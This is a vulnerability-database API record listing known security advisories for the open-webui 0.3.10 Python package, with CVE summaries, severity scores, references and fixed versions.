Django REST framework

Package Instance

Lookup for vulnerable packages by Package URL.

Purlpkg:pypi/open-webui@0.3.10
Typepypi
Namespace
Nameopen-webui
Version0.3.10
Qualifiers
Subpath
Is_vulnerabletrue
Next_non_vulnerable_version0.9.5
Latest_non_vulnerable_version0.9.5
Affected_by_vulnerabilities
0
url VCID-14xt-qwyg-w3cj
vulnerability_id VCID-14xt-qwyg-w3cj
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, the tool_servers and terminal_servers keys in utils/tools.py do use a prefix. When two or more Open WebUI instances share a Redis database (a supported and documented deployment pattern, e.g., for multi-region deployments, blue-green setups, or cluster topologies), the unprefixed keys collide. An admin on Instance A writing to tool_servers overwrites the value read by Instance B — causing Instance B's users to receive Instance A's tool server configuration. This vulnerability is fixed in 0.9.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-44552
reference_id
reference_type
scores
0
value 0.00037
scoring_system epss
scoring_elements 0.11456
published_at 2026-06-14T12:55:00Z
1
value 0.00037
scoring_system epss
scoring_elements 0.1142
published_at 2026-06-11T12:55:00Z
2
value 0.00037
scoring_system epss
scoring_elements 0.1149
published_at 2026-06-13T12:55:00Z
3
value 0.00037
scoring_system epss
scoring_elements 0.11496
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-44552
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-44552
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-44552
3
reference_url https://github.com/advisories/GHSA-3x8w-4f7p-xxc2
reference_id GHSA-3x8w-4f7p-xxc2
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-3x8w-4f7p-xxc2
4
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-3x8w-4f7p-xxc2
reference_id GHSA-3x8w-4f7p-xxc2
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-19T03:55:41Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-3x8w-4f7p-xxc2
fixed_packages
0
url pkg:pypi/open-webui@0.9.0
purl pkg:pypi/open-webui@0.9.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1g27-4vq6-7kdz
1
vulnerability VCID-1tu1-b9de-nfaa
2
vulnerability VCID-4v8w-kv6g-kkbc
3
vulnerability VCID-4x63-8x64-d3bq
4
vulnerability VCID-5jna-wvd7-j7cm
5
vulnerability VCID-5wfg-zqcy-c7ar
6
vulnerability VCID-8nzh-cpda-dkca
7
vulnerability VCID-8y4k-pj2n-8uhm
8
vulnerability VCID-cw4k-3s8z-uqh8
9
vulnerability VCID-dz6g-jgmg-wqce
10
vulnerability VCID-dzh3-rqx4-fqhv
11
vulnerability VCID-ef1t-pxjm-j7cz
12
vulnerability VCID-hj5f-yk3y-ffdg
13
vulnerability VCID-wcz4-vwx4-tufb
14
vulnerability VCID-yug9-shts-kufb
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.0
aliases CVE-2026-44552, GHSA-3x8w-4f7p-xxc2
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-14xt-qwyg-w3cj
1
url VCID-1g27-4vq6-7kdz
vulnerability_id VCID-1g27-4vq6-7kdz
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.5, Pin/Unpin is a write operation (modifies the message's is_pinned , pinned_by, pinned_at fields), but in standard channels it only checks read permission, allowing users with read-only access to pin/unpin any message. This vulnerability is fixed in 0.9.5.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-45386
reference_id
reference_type
scores
0
value 0.00036
scoring_system epss
scoring_elements 0.11183
published_at 2026-06-14T12:55:00Z
1
value 0.00036
scoring_system epss
scoring_elements 0.11159
published_at 2026-06-11T12:55:00Z
2
value 0.00036
scoring_system epss
scoring_elements 0.11216
published_at 2026-06-13T12:55:00Z
3
value 0.00036
scoring_system epss
scoring_elements 0.11225
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-45386
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-45386
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-45386
3
reference_url https://github.com/advisories/GHSA-5gc6-xhv4-2wg6
reference_id GHSA-5gc6-xhv4-2wg6
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-5gc6-xhv4-2wg6
4
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-5gc6-xhv4-2wg6
reference_id GHSA-5gc6-xhv4-2wg6
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-19T12:32:38Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-5gc6-xhv4-2wg6
fixed_packages
0
url pkg:pypi/open-webui@0.9.5
purl pkg:pypi/open-webui@0.9.5
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.5
aliases CVE-2026-45386, GHSA-5gc6-xhv4-2wg6
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-1g27-4vq6-7kdz
2
url VCID-1svn-zazq-e3f2
vulnerability_id VCID-1svn-zazq-e3f2
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.5.11, there is a blind server side request forgery (SSRF) via the PDF generate function. In the PDF export, user inputs are interpreted as HTML and embedded into the PDF. According to tests, scripts and some potentially dangerous tags (iFrame, Object, etc.) are blocked, preventing server-side content from being read through this vulnerability. However, an image tag can be used to force a server-side request (SSRF), as shown in the following below. This vulnerability is fixed in 0.5.11.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-45347
reference_id
reference_type
scores
0
value 0.0003
scoring_system epss
scoring_elements 0.09067
published_at 2026-06-12T12:55:00Z
1
value 0.0003
scoring_system epss
scoring_elements 0.09057
published_at 2026-06-14T12:55:00Z
2
value 0.0003
scoring_system epss
scoring_elements 0.09019
published_at 2026-06-11T12:55:00Z
3
value 0.0003
scoring_system epss
scoring_elements 0.09069
published_at 2026-06-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-45347
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://github.com/open-webui/open-webui/commit/167c8bf00d165af523acfc3b870749f6be6d3e57
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/commit/167c8bf00d165af523acfc3b870749f6be6d3e57
3
reference_url https://github.com/open-webui/open-webui/releases/tag/v0.5.11
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/releases/tag/v0.5.11
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-45347
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-45347
5
reference_url https://github.com/advisories/GHSA-f776-fp4w-266c
reference_id GHSA-f776-fp4w-266c
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-f776-fp4w-266c
6
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-f776-fp4w-266c
reference_id GHSA-f776-fp4w-266c
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-18T12:51:06Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-f776-fp4w-266c
fixed_packages
0
url pkg:pypi/open-webui@0.5.11
purl pkg:pypi/open-webui@0.5.11
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-14xt-qwyg-w3cj
1
vulnerability VCID-1g27-4vq6-7kdz
2
vulnerability VCID-1tu1-b9de-nfaa
3
vulnerability VCID-2rs8-62x1-s7h7
4
vulnerability VCID-2xdz-v8cw-fygv
5
vulnerability VCID-32yb-vsfs-43a8
6
vulnerability VCID-3436-znsq-guds
7
vulnerability VCID-4rz6-hw32-jueb
8
vulnerability VCID-4sn4-mrbm-dfgh
9
vulnerability VCID-4v8w-kv6g-kkbc
10
vulnerability VCID-4x63-8x64-d3bq
11
vulnerability VCID-5319-t7jm-y3bx
12
vulnerability VCID-5jna-wvd7-j7cm
13
vulnerability VCID-5wfg-zqcy-c7ar
14
vulnerability VCID-5wzn-mfwg-ybc3
15
vulnerability VCID-66zh-9jk7-9bfx
16
vulnerability VCID-6rbm-rm25-hqgy
17
vulnerability VCID-7j5a-pu4k-kucf
18
vulnerability VCID-7nbc-ng1s-suck
19
vulnerability VCID-8n6u-wgz9-1bgj
20
vulnerability VCID-8nzh-cpda-dkca
21
vulnerability VCID-8y4k-pj2n-8uhm
22
vulnerability VCID-94nj-qkdf-xfhn
23
vulnerability VCID-9jud-sr2a-8yc3
24
vulnerability VCID-chug-ma8r-cucc
25
vulnerability VCID-cw4k-3s8z-uqh8
26
vulnerability VCID-dz6g-jgmg-wqce
27
vulnerability VCID-dzh3-rqx4-fqhv
28
vulnerability VCID-ef1t-pxjm-j7cz
29
vulnerability VCID-gw77-ux3j-qfaa
30
vulnerability VCID-hj5f-yk3y-ffdg
31
vulnerability VCID-jfs9-dps1-27a2
32
vulnerability VCID-jnsg-u9dy-r3d5
33
vulnerability VCID-k17g-bd9g-67f7
34
vulnerability VCID-k9jf-5jzd-pkge
35
vulnerability VCID-mn21-kwuu-w7by
36
vulnerability VCID-n4ma-zcpv-5fbp
37
vulnerability VCID-nxvm-97r4-6ybz
38
vulnerability VCID-pkds-1xgn-q3bv
39
vulnerability VCID-pvep-chj7-ekeg
40
vulnerability VCID-pwsg-72yy-quhk
41
vulnerability VCID-q682-k826-efhv
42
vulnerability VCID-qgfh-7u8n-y7c7
43
vulnerability VCID-qjt1-zxx8-r7ht
44
vulnerability VCID-r7vt-4bqm-f7hb
45
vulnerability VCID-reqw-pfm8-c7g5
46
vulnerability VCID-rhhj-rccv-87hw
47
vulnerability VCID-s625-eg1w-gfd1
48
vulnerability VCID-t571-d65a-cyb2
49
vulnerability VCID-tz2k-gazs-mqgd
50
vulnerability VCID-u25g-p4nx-gqd1
51
vulnerability VCID-ujye-g4rj-8be5
52
vulnerability VCID-um53-kf7u-kkg6
53
vulnerability VCID-vghe-uuzj-m7cu
54
vulnerability VCID-vkx3-71kv-sugt
55
vulnerability VCID-w2vd-r3hr-w3bt
56
vulnerability VCID-wb88-83cj-ffhy
57
vulnerability VCID-wcz4-vwx4-tufb
58
vulnerability VCID-yug9-shts-kufb
59
vulnerability VCID-yysb-dk2k-f7g4
60
vulnerability VCID-ze3m-g96u-27fc
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.5.11
aliases CVE-2026-45347, GHSA-f776-fp4w-266c
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-1svn-zazq-e3f2
3
url VCID-1tu1-b9de-nfaa
vulnerability_id VCID-1tu1-b9de-nfaa
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.5, an IDOR vulnerability exists in the Channels feature of Open WebUI, allowing any channel member to modify messages sent by other members (including administrators) within the same channel. In the update_message_by_id function, for group or dm type channels, only the caller's membership in the channel is checked via the is_user_channel_member function, without verifying message ownership. This allows any channel member to modify messages sent by other members within the same channel. This vulnerability is fixed in 0.9.5.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-45385
reference_id
reference_type
scores
0
value 0.00036
scoring_system epss
scoring_elements 0.11216
published_at 2026-06-13T12:55:00Z
1
value 0.00036
scoring_system epss
scoring_elements 0.11183
published_at 2026-06-14T12:55:00Z
2
value 0.00036
scoring_system epss
scoring_elements 0.11159
published_at 2026-06-11T12:55:00Z
3
value 0.00036
scoring_system epss
scoring_elements 0.11225
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-45385
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-45385
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-45385
3
reference_url https://github.com/advisories/GHSA-wwhq-cx22-f7vv
reference_id GHSA-wwhq-cx22-f7vv
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-wwhq-cx22-f7vv
4
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-wwhq-cx22-f7vv
reference_id GHSA-wwhq-cx22-f7vv
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-18T15:56:23Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-wwhq-cx22-f7vv
fixed_packages
0
url pkg:pypi/open-webui@0.9.5
purl pkg:pypi/open-webui@0.9.5
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.5
aliases CVE-2026-45385, GHSA-wwhq-cx22-f7vv
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-1tu1-b9de-nfaa
4
url VCID-22d8-rsah-vbg2
vulnerability_id VCID-22d8-rsah-vbg2
summary In version v0.3.10 of open-webui/open-webui, the `api/v1/utils/pdf` endpoint lacks authentication mechanisms, allowing unauthenticated attackers to access the PDF generation service. This vulnerability can be exploited by sending a POST request with an excessively large payload, potentially leading to server resource exhaustion and denial of service (DoS). Additionally, unauthorized users can misuse the endpoint to generate PDFs without verification, resulting in service misuse and potential operational and financial impacts.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-8053
reference_id
reference_type
scores
0
value 0.00729
scoring_system epss
scoring_elements 0.73198
published_at 2026-06-12T12:55:00Z
1
value 0.00729
scoring_system epss
scoring_elements 0.73211
published_at 2026-06-14T12:55:00Z
2
value 0.00729
scoring_system epss
scoring_elements 0.7312
published_at 2026-06-11T12:55:00Z
3
value 0.00729
scoring_system epss
scoring_elements 0.73213
published_at 2026-06-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-8053
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-8053
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-8053
3
reference_url https://huntr.com/bounties/ebe8c1fa-113b-4df9-be03-a406b9adb9f4
reference_id ebe8c1fa-113b-4df9-be03-a406b9adb9f4
reference_type
scores
0
value 7.5
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-03-20T13:10:22Z/
url https://huntr.com/bounties/ebe8c1fa-113b-4df9-be03-a406b9adb9f4
4
reference_url https://github.com/advisories/GHSA-9vf8-xgwm-97r8
reference_id GHSA-9vf8-xgwm-97r8
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-9vf8-xgwm-97r8
fixed_packages
0
url pkg:pypi/open-webui@0.3.12
purl pkg:pypi/open-webui@0.3.12
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-14xt-qwyg-w3cj
1
vulnerability VCID-1g27-4vq6-7kdz
2
vulnerability VCID-1svn-zazq-e3f2
3
vulnerability VCID-1tu1-b9de-nfaa
4
vulnerability VCID-2rs8-62x1-s7h7
5
vulnerability VCID-2xdz-v8cw-fygv
6
vulnerability VCID-32yb-vsfs-43a8
7
vulnerability VCID-3436-znsq-guds
8
vulnerability VCID-3hv8-ys1d-63a6
9
vulnerability VCID-4rz6-hw32-jueb
10
vulnerability VCID-4sn4-mrbm-dfgh
11
vulnerability VCID-4v8w-kv6g-kkbc
12
vulnerability VCID-4x63-8x64-d3bq
13
vulnerability VCID-5319-t7jm-y3bx
14
vulnerability VCID-5jna-wvd7-j7cm
15
vulnerability VCID-5wfg-zqcy-c7ar
16
vulnerability VCID-5wzn-mfwg-ybc3
17
vulnerability VCID-66zh-9jk7-9bfx
18
vulnerability VCID-68jf-2utx-x7br
19
vulnerability VCID-6rbm-rm25-hqgy
20
vulnerability VCID-7j5a-pu4k-kucf
21
vulnerability VCID-7nbc-ng1s-suck
22
vulnerability VCID-8n6u-wgz9-1bgj
23
vulnerability VCID-8nzh-cpda-dkca
24
vulnerability VCID-8qvj-xndv-v3ay
25
vulnerability VCID-8y4k-pj2n-8uhm
26
vulnerability VCID-94nj-qkdf-xfhn
27
vulnerability VCID-9jud-sr2a-8yc3
28
vulnerability VCID-9zyk-459z-x3a4
29
vulnerability VCID-chug-ma8r-cucc
30
vulnerability VCID-cw4k-3s8z-uqh8
31
vulnerability VCID-dz6g-jgmg-wqce
32
vulnerability VCID-dzh3-rqx4-fqhv
33
vulnerability VCID-ef1t-pxjm-j7cz
34
vulnerability VCID-gw77-ux3j-qfaa
35
vulnerability VCID-hj5f-yk3y-ffdg
36
vulnerability VCID-jfs9-dps1-27a2
37
vulnerability VCID-jnsg-u9dy-r3d5
38
vulnerability VCID-k17g-bd9g-67f7
39
vulnerability VCID-k9jf-5jzd-pkge
40
vulnerability VCID-mn21-kwuu-w7by
41
vulnerability VCID-n4ma-zcpv-5fbp
42
vulnerability VCID-nxvm-97r4-6ybz
43
vulnerability VCID-pkds-1xgn-q3bv
44
vulnerability VCID-pvep-chj7-ekeg
45
vulnerability VCID-pwsg-72yy-quhk
46
vulnerability VCID-q682-k826-efhv
47
vulnerability VCID-qgfh-7u8n-y7c7
48
vulnerability VCID-qjt1-zxx8-r7ht
49
vulnerability VCID-r7vt-4bqm-f7hb
50
vulnerability VCID-reqw-pfm8-c7g5
51
vulnerability VCID-rhhj-rccv-87hw
52
vulnerability VCID-s625-eg1w-gfd1
53
vulnerability VCID-t571-d65a-cyb2
54
vulnerability VCID-tz2k-gazs-mqgd
55
vulnerability VCID-u25g-p4nx-gqd1
56
vulnerability VCID-ujye-g4rj-8be5
57
vulnerability VCID-um53-kf7u-kkg6
58
vulnerability VCID-vghe-uuzj-m7cu
59
vulnerability VCID-vj38-mn12-v7br
60
vulnerability VCID-vkx3-71kv-sugt
61
vulnerability VCID-w2vd-r3hr-w3bt
62
vulnerability VCID-wb88-83cj-ffhy
63
vulnerability VCID-wcz4-vwx4-tufb
64
vulnerability VCID-wja7-68ea-mug6
65
vulnerability VCID-yug9-shts-kufb
66
vulnerability VCID-yysb-dk2k-f7g4
67
vulnerability VCID-ze3m-g96u-27fc
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.3.12
aliases CVE-2024-8053, GHSA-9vf8-xgwm-97r8
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-22d8-rsah-vbg2
5
url VCID-2rs8-62x1-s7h7
vulnerability_id VCID-2rs8-62x1-s7h7
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.8.0, the profile_image_url field on the user profile update form accepted arbitrary data: URI values without MIME-type validation, resulting in a XSS vulnerability. This vulnerability is fixed in 0.8.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-45299
reference_id
reference_type
scores
0
value 0.00012
scoring_system epss
scoring_elements 0.01751
published_at 2026-06-12T12:55:00Z
1
value 0.00012
scoring_system epss
scoring_elements 0.01762
published_at 2026-06-14T12:55:00Z
2
value 0.00012
scoring_system epss
scoring_elements 0.01747
published_at 2026-06-11T12:55:00Z
3
value 0.00012
scoring_system epss
scoring_elements 0.01755
published_at 2026-06-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-45299
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://github.com/open-webui/open-webui/releases/tag/v0.8.0
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/releases/tag/v0.8.0
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-45299
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-45299
4
reference_url https://github.com/advisories/GHSA-6gh2-q7cp-9qf6
reference_id GHSA-6gh2-q7cp-9qf6
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-6gh2-q7cp-9qf6
5
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-6gh2-q7cp-9qf6
reference_id GHSA-6gh2-q7cp-9qf6
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-15T22:20:06Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-6gh2-q7cp-9qf6
fixed_packages
0
url pkg:pypi/open-webui@0.8.0
purl pkg:pypi/open-webui@0.8.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-14xt-qwyg-w3cj
1
vulnerability VCID-1g27-4vq6-7kdz
2
vulnerability VCID-1tu1-b9de-nfaa
3
vulnerability VCID-2xdz-v8cw-fygv
4
vulnerability VCID-32yb-vsfs-43a8
5
vulnerability VCID-3436-znsq-guds
6
vulnerability VCID-4rz6-hw32-jueb
7
vulnerability VCID-4v8w-kv6g-kkbc
8
vulnerability VCID-4x63-8x64-d3bq
9
vulnerability VCID-5319-t7jm-y3bx
10
vulnerability VCID-5jna-wvd7-j7cm
11
vulnerability VCID-5wfg-zqcy-c7ar
12
vulnerability VCID-5wzn-mfwg-ybc3
13
vulnerability VCID-6rbm-rm25-hqgy
14
vulnerability VCID-7nbc-ng1s-suck
15
vulnerability VCID-8n6u-wgz9-1bgj
16
vulnerability VCID-8nzh-cpda-dkca
17
vulnerability VCID-8y4k-pj2n-8uhm
18
vulnerability VCID-chug-ma8r-cucc
19
vulnerability VCID-cw4k-3s8z-uqh8
20
vulnerability VCID-dz6g-jgmg-wqce
21
vulnerability VCID-dzh3-rqx4-fqhv
22
vulnerability VCID-ef1t-pxjm-j7cz
23
vulnerability VCID-hj5f-yk3y-ffdg
24
vulnerability VCID-jfs9-dps1-27a2
25
vulnerability VCID-k9jf-5jzd-pkge
26
vulnerability VCID-n4ma-zcpv-5fbp
27
vulnerability VCID-nxvm-97r4-6ybz
28
vulnerability VCID-pkds-1xgn-q3bv
29
vulnerability VCID-pwsg-72yy-quhk
30
vulnerability VCID-q682-k826-efhv
31
vulnerability VCID-qgfh-7u8n-y7c7
32
vulnerability VCID-qjt1-zxx8-r7ht
33
vulnerability VCID-r7vt-4bqm-f7hb
34
vulnerability VCID-reqw-pfm8-c7g5
35
vulnerability VCID-rhhj-rccv-87hw
36
vulnerability VCID-s625-eg1w-gfd1
37
vulnerability VCID-t571-d65a-cyb2
38
vulnerability VCID-u25g-p4nx-gqd1
39
vulnerability VCID-ujye-g4rj-8be5
40
vulnerability VCID-um53-kf7u-kkg6
41
vulnerability VCID-vghe-uuzj-m7cu
42
vulnerability VCID-vkx3-71kv-sugt
43
vulnerability VCID-w2vd-r3hr-w3bt
44
vulnerability VCID-wb88-83cj-ffhy
45
vulnerability VCID-wcz4-vwx4-tufb
46
vulnerability VCID-yug9-shts-kufb
47
vulnerability VCID-yysb-dk2k-f7g4
48
vulnerability VCID-ze3m-g96u-27fc
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.8.0
aliases CVE-2026-45299, GHSA-6gh2-q7cp-9qf6
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-2rs8-62x1-s7h7
6
url VCID-2xdz-v8cw-fygv
vulnerability_id VCID-2xdz-v8cw-fygv
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, the /responses endpoint in the OpenAI router accepts any authenticated user and forwards requests directly to upstream LLM providers without enforcing per-model access control. While the primary chat completion endpoint (generate_chat_completion) checks model ownership, group membership, and AccessGrants before allowing a request, the /responses proxy only validates that the user has a valid session via get_verified_user. This allows any authenticated user to interact with any model configured on the instance by sending a POST request to /api/openai/responses with an arbitrary model ID. This vulnerability is fixed in 0.9.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-44556
reference_id
reference_type
scores
0
value 0.00014
scoring_system epss
scoring_elements 0.02545
published_at 2026-06-13T12:55:00Z
1
value 0.00014
scoring_system epss
scoring_elements 0.02551
published_at 2026-06-11T12:55:00Z
2
value 0.00014
scoring_system epss
scoring_elements 0.02555
published_at 2026-06-14T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-44556
1
